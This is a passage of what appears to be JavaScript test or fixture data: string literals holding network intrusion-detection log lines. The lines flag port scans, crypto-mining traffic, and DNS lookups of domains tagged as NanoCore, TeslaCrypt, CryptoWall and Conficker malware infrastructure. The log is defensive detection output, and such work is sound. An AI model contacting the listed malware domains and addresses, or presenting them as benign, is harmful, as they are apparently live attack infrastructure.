21,5715,8980,10420,11605,12047,12313,14194,16614,18821,19384,19914,20493,20662,22264,23400,24256,24630,26792,27848,28032,29710,29780,29862,30024,30379,30779,31389,31600,32363,34293,34666,38393,38582,39101,39208,39980,40008,40189,40861,41098,41639,43139,43615,45081,45604,46225,46843,52305,52973,53239,56326,57673,60064,63656 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:43:32.000481" r2d2 2.200.108.59 12155,12157,12158,12160,12162,12163,12164,12166,12169,12172,12175,12177,32998,33224,33400,34208,35720,36248,37708,37816,38014,38654,38940,39216,39566,40054,40868,40980,41818,42006,42050,42134,42559,42560,42562,42563,42566,43348,44548,45218,45478,45552,45818,46636,47784,47952,48388,48410,48701,48703,48706,48760,49076,49216,49902,50030,50552,50610,51552,51618,51996,52350,53334,53844,53956,54366,54510,54828,56512,57360,57962,58014,59150,59460,59780,59930,60330,60516,60788 77.53.81.105 21,6581,7550,8980,10420,12047,12049,12313,13048,13692,15320,16166,18821,19384,20493,21322,22264,22980,23666,24256,24301,24630,26109,26294,26706,27221,27393,27805,27848,29554,30293,30319,31389,32748,33103,33809,34666,35435,35862,38582,39101,39980,40673,40697,40861,42849,43072,43139,44955,49237,49427,49595,51997,52305,56374,57274,61007,62414,62872,65065 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:43:42.068978" r2d2 10.43.192.103 59055 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:43:33.000623" r2d2 2.200.108.59 12169,12170,12174,33188,33874,34024,34880,35844,36310,37708,38654,38940,39084,39216,39460,39764,39960,41818,42134,42404,42564,42565,44298,44480,45218,45478,46392,47784,47834,47896,48298,48704,48705,48706,49076,50030,50732,51122,51430,51552,51996,52038,52350,53844,54100,54296,55142,56616,56746,57086,57386,57542,57978,58014,58162,58946,59262,59780,59930,60330,60334,60516,60582,60652,60788 77.53.81.105 21,9250,12445,13048,13692,14261,15320,19780,19914,23666,24301,26294,26305,26323,26706,27221,27393,27805,29151,29554,29780,29862,30319,30779,32515,32516,32748,33809,33921,34779,35435,38494,38784,38910,39208,40446,40673,41639,43524,44697,44955,45081,45604,46807,47802,47930,49237,49427,49848,52973,53239,53678,53926,57274,59573,60069,61007,62244 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:43:43.382360" r2d2 2.200.110.232 64304 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:43:43.390731" r2d2 2.200.110.232 63491 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:43:43.402032" r2d2 2.200.110.232 64839 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:43:43.404193" r2d2 2.200.107.146 25242 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:43:42.559267" r2d2 178.17.174.14 40936 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; SynapseWorkstation.3.2.1; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:43:47.809375" r2d2 2.200.110.233 63718 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:43:47.819738" r2d2 2.200.110.233 63384 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:43:48.001065" r2d2 2.200.110.233 64421 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:43:42.559192" r2d2 178.17.174.14 40936 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; SynapseWorkstation.3.2.1; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:43:52.257602" r2d2 2.200.110.233 63377 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:43:54.163871" r2d2 10.43.192.103 59057 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:44:06.222173" r2d2 10.43.192.103 59068 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:44:30.326798" r2d2 10.43.192.103 59116 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:44:26.000606" r2d2 120.204.196.129 33998,34062,40348,40442,40536,41190,41942,44462,45324,47692,52348,56644,57974 2.200.108.85 22,222,443,666,830,2323,2382,4118,5555,7777,8888,22222,55554 TCP IP 120.204.196.129 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:44:46.427597" r2d2 10.3.160.42 14126 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:44:46.527574" r2d2 10.3.160.42 14126 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:44:46.629278" r2d2 10.3.160.42 14126 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:44:46.827761" r2d2 10.3.160.42 14126 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:44:47.130001" r2d2 10.3.160.42 14126 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:44:47.530332" r2d2 10.3.160.42 14126 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:44:48.027523" r2d2 10.3.160.42 14126 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:44:48.442436" r2d2 10.43.192.103 59119 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:44:48.628778" r2d2 10.3.160.42 14126 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:44:58.500409" r2d2 2.200.110.232 64496 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:44:58.501897" r2d2 2.200.107.146 29615 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:44:58.526334" r2d2 2.200.110.233 63823 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:44:59.609044" r2d2 2.200.110.232 64555 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:44:59.610854" r2d2 2.200.107.146 25209 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:44:59.622340" r2d2 2.200.110.232 64166 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:45:00.529356" r2d2 10.43.192.103 59121 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:45:02.261966" r2d2 2.200.110.233 64711 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:45:06.563377" r2d2 10.43.192.103 59122 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:45:18.630374" r2d2 10.43.192.103 59124 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:45:36.729027" r2d2 10.43.192.103 59127 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:45:48.819843" r2d2 10.43.192.103 59129 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:45:42.615128" r2d2 10.1.19.42 59607 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:45:54.844923" r2d2 10.43.192.103 59130 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:45:59.621612" r2d2 2.200.110.232 65436 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:46:06.901692" r2d2 10.43.192.103 59132 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:46:08.105571" r2d2 2.200.110.233 64202 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:46:12.263334" r2d2 2.200.110.232 63875 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:46:12.295374" r2d2 2.200.110.233 63260 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:46:18.971575" r2d2 10.43.192.103 59135 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:46:20.165009" r2d2 2.200.110.232 64901 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:46:25.009364" r2d2 10.43.192.103 59136 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:46:43.133383" r2d2 10.43.192.103 59139 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:46:43.382485" r2d2 2.200.110.232 64513 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:46:52.650680" r2d2 2.200.110.233 64991 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:46:52.652435" r2d2 2.200.107.146 13410 54.226.255.149 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:46:55.194394" r2d2 10.43.192.103 59141 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:47:01.219575" r2d2 10.43.192.103 59142 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:47:07.262646" r2d2 178.17.174.14 50662 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts; BOIE9;ENGB\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:47:03.992891" r2d2 10.15.221.51 58429 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:47:07.262655" r2d2 178.17.174.14 50662 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts; BOIE9;ENGB\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:47:04.732381" r2d2 10.15.221.51 58429 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:47:03.981828" r2d2 10.15.221.51 58429 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:47:09.006733" r2d2 178.17.174.14 50748 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; Zango 10.3.37.0\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:47:13.284263" r2d2 10.43.192.103 59144 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:47:09.006724" r2d2 178.17.174.14 50748 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; Zango 10.3.37.0\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:47:22.293972" r2d2 2.200.110.232 65351 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:47:22.322050" r2d2 2.200.110.233 63723 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:47:31.401304" r2d2 10.43.192.103 59147 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:47:42.910546" r2d2 2.200.110.232 49355 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:47:42.936882" r2d2 2.200.110.233 63940 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:47:42.938467" r2d2 2.200.107.146 49473 205.251.197.89 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:47:43.466522" r2d2 10.43.192.103 59149 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:47:49.493450" r2d2 10.43.192.103 59150 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:47:59.607765" r2d2 2.200.110.232 65345 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:47:59.623118" r2d2 2.200.110.232 64434 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:48:07.604163" r2d2 10.43.192.103 59157 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:48:13.622999" r2d2 10.43.192.103 59158 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:48:25.702138" r2d2 10.43.192.103 59160 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:48:28.538103" r2d2 2.200.110.233 64330 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:48:26.378297" r2d2 10.1.19.42 59609 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:48:32.329007" r2d2 2.200.110.232 49187 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:48:32.364983" r2d2 2.200.110.233 64980 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:48:43.805882" r2d2 10.43.192.103 59163 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:48:46.807313" r2d2 10.3.160.42 14128 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:48:46.907475" r2d2 10.3.160.42 14128 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:48:47.006908" r2d2 10.3.160.42 14128 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:48:47.213302" r2d2 10.3.160.42 14128 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:48:47.906849" r2d2 10.3.160.42 14128 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:48:48.407125" r2d2 10.3.160.42 14128 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:48:49.007173" r2d2 10.3.160.42 14128 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:48:55.049297" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS twhwnm.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049316" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS inresdxcjh.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049572" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS emwns.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049570" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS xajcffai.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049583" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS sikegt.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049574" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS sikegt.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049828" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ghcuzaoykh.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.050062" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS cpkeoup.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049827" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ghcuzaoykh.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049310" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS inresdxcjh.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.050502" r2d2 2.200.109.50 60822 8.8.8.8 53 UDP DNS twhwnm.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049319" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS xajcffai.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.050056" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS gqznujsy.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.050697" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS fkkevyrrkt.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.050694" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS fkkevyrrkt.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.049825" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS crvvubg.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.051276" r2d2 2.200.109.50 60345 8.8.8.8 53 UDP DNS sikegt.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.050060" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS cpkeoup.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.051466" r2d2 2.200.109.50 62096 8.8.8.8 53 UDP DNS crvvubg.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.051155" r2d2 2.200.109.50 61818 8.8.8.8 53 UDP DNS inresdxcjh.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.051660" r2d2 2.200.109.50 61915 8.8.8.8 53 UDP DNS gqznujsy.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.051081" r2d2 2.200.109.50 61347 8.8.8.8 53 UDP DNS emwns.info "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.051273" r2d2 2.200.109.50 62276 8.8.8.8 53 UDP DNS xajcffai.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.051906" r2d2 2.200.109.50 60165 8.8.8.8 53 UDP DNS fkkevyrrkt.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:48:55.071328" r2d2 8.8.8.8 53 2.200.109.50 60345 UDP DNS (sikegt).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:48:55.902768" r2d2 10.43.192.103 59165 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:49:01.942607" r2d2 10.43.192.103 59166 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:49:02.333550" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS nygbygdy.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.333709" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS quuoefepnd.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.333711" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS quuoefepnd.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.333999" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS yhxdtvmpsme.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.333989" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS dfwyur.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.333699" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS nygbygdy.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334241" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS mbhkldvn.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334244" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS pvcpgymqj.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334248" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS pvcpgymqj.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.333713" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS ukvfidbbajb.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334439" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS zcvenjenv.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334430" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS gbsnxeai.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334232" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS mbhkldvn.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334888" r2d2 2.200.109.50 61429 8.8.8.8 53 UDP DNS quuoefepnd.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334641" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS bjfpsevedfk.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.335310" r2d2 2.200.109.50 62255 8.8.8.8 53 UDP DNS mbhkldvn.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334245" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS gbsnxeai.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334895" r2d2 2.200.109.50 60698 8.8.8.8 53 UDP DNS dfwyur.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.336095" r2d2 2.200.109.50 60348 8.8.8.8 53 UDP DNS bjfpsevedfk.ws "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.335324" r2d2 2.200.109.50 61217 8.8.8.8 53 UDP DNS gbsnxeai.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334630" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS zcvenjenv.org "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.334892" r2d2 2.200.109.50 60407 8.8.8.8 53 UDP DNS nygbygdy.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.335321" r2d2 2.200.109.50 61532 8.8.8.8 53 UDP DNS pvcpgymqj.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:02.354730" r2d2 8.8.8.8 53 2.200.109.50 60348 UDP DNS (bjfpsevedfk).ws "sinkholed by farsight (malware)" (heuristic)\n' +
    '"2021-01-11 03:49:10.666688" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS fhlewrf.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.666768" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS uuxurzkxuiv.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.666772" r2d2 10.2.120.16 1697 10.1.20.50 53 UDP DNS uuxurzkxuiv.cn "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667166" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS cprsmffs.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667014" r2d2 10.2.120.16 1693 10.1.20.50 53 UDP DNS iopvkooynu.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667249" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS erifflhhi.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667187" r2d2 10.2.120.16 1695 10.1.20.50 53 UDP DNS erifflhhi.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667526" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS nnefmwehs.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.666943" r2d2 10.2.120.16 1691 10.1.20.50 53 UDP DNS evegjfa.biz "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667381" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS skgsvrwff.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667731" r2d2 10.2.120.16 1694 10.1.20.50 53 UDP DNS qrzfnzeqz.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667174" r2d2 10.2.120.16 1690 10.1.20.50 53 UDP DNS cprsmffs.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667601" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ououerm.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.668544" r2d2 2.200.109.50 62026 8.8.8.8 53 UDP DNS skgsvrwff.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667374" r2d2 10.2.120.16 1692 10.1.20.50 53 UDP DNS skgsvrwff.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667719" r2d2 2.200.109.50 60417 8.8.8.8 53 UDP DNS fhlewrf.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.668814" r2d2 2.200.109.50 61271 8.8.8.8 53 UDP DNS ououerm.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667534" r2d2 10.2.120.16 1027 10.1.20.50 53 UDP DNS nnefmwehs.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.668301" r2d2 2.200.109.50 61323 8.8.8.8 53 UDP DNS cprsmffs.com "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.667608" r2d2 10.2.120.16 1689 10.1.20.50 53 UDP DNS ououerm.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.668147" r2d2 2.200.109.50 61648 8.8.8.8 53 UDP DNS iopvkooynu.cc "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:10.668916" r2d2 2.200.109.50 62182 8.8.8.8 53 UDP DNS qrzfnzeqz.net "conficker dga (malware)" 360.com\n' +
    '"2021-01-11 03:49:14.027757" r2d2 10.43.192.103 59168 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:49:18.003930" r2d2 10.2.120.16 1696 10.1.20.50 53 UDP DNS fksxbf.info "conficker dga (malware)" 360.com\n' +
